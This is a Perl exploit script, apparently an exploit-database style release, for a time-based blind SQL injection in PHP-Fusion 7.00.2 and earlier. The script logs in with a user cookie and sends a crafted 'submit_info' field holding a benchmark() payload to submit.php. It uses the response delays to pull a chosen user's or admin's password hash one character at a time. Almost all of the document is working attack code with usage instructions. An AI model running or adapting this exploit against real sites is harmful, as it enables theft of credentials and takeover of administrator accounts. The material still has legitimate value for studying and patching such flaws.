|
#!/usr/bin/perl -w # ------------------------------------------------------- # PHP-Fusion <= 7.00.2 Remote Blind SQL Injection Exploit # by athos - staker[at]hotmail[dot]it # download on http://php-fusion.co.uk # ------------------------------------------------------- # Usage: # perl xpl.pl host/path prefix user_id user_pwd target_id # perl xpl.pl localhost/php-fusion fusion 5 anarchy 1 # ------------------------------------------------------- # Note: magic_quotes_gpc off # don't add me on msn messenger # my email staker.38@gmail.com # # Greetz: str0ke,The:Paradox,darkjoker,Key and #cancer :D # ------------------------------------------------------- # User Password: my $field = "user_password" ; # Admin Password: my $field = "user_admin_password"; # -------------------------------------------------------
use strict; use Digest::MD5('md5_hex'); use LWP::UserAgent;
my $field = "user_password"; my ($stop,$start,$hash);
my $domain = shift; my $ptable = shift; my $ulogin = shift; my $plogin = shift; my $userid = shift or &usage;
my @chars = (48..57, 97..102); my $substr = 1; my $http = new LWP::UserAgent;
sub send_request { my $post = undef; my $host = $domain; my $param = shift @_ or die $!; $host .= "/submit.php?stype=l";
$http->default_header('Cookie' => "fusion_user=${ulogin}.".md5_hex($plogin)); $post = $http->post('http://'.$host,[ 'link_category' => 1, 'link_name' => 1, 'link_url' => 1, 'link_description' => 1, 'submit_link' => 'Submit+Link', 'submit_info[pwn]' => $param, ]); }
sub give_char { my $send = undef; my ($charz,$uidz) = @_; $send = "' or (select if((ascii(substring". "($field,$uidz,1))=$charz),". "benchmark(230000000,char(0)),". "0) from ${ptable}_users where user_id=$userid))#";
return $send; }
for(1..32) { foreach my $set(@chars) { my $start = time(); send_request(give_char($set,$substr)); my $stop = time(); if($stop - $start > 6) { syswrite(STDOUT,chr($set)); $substr++; last; } } }
sub usage { print "PHP-Fusion <= 7.0.2 Remote Blind SQL Injection Exploit\n"; print "by athos - staker[at]hotmail[dot]it\n"; print "Usage: perl $0 [host/path] [table prefix] [id] [password] [target id]\n"; print "Usage: perl $0 localhost/php-fusion fusion 5 p4ssw0rd 1\n"; exit; }
|
|
|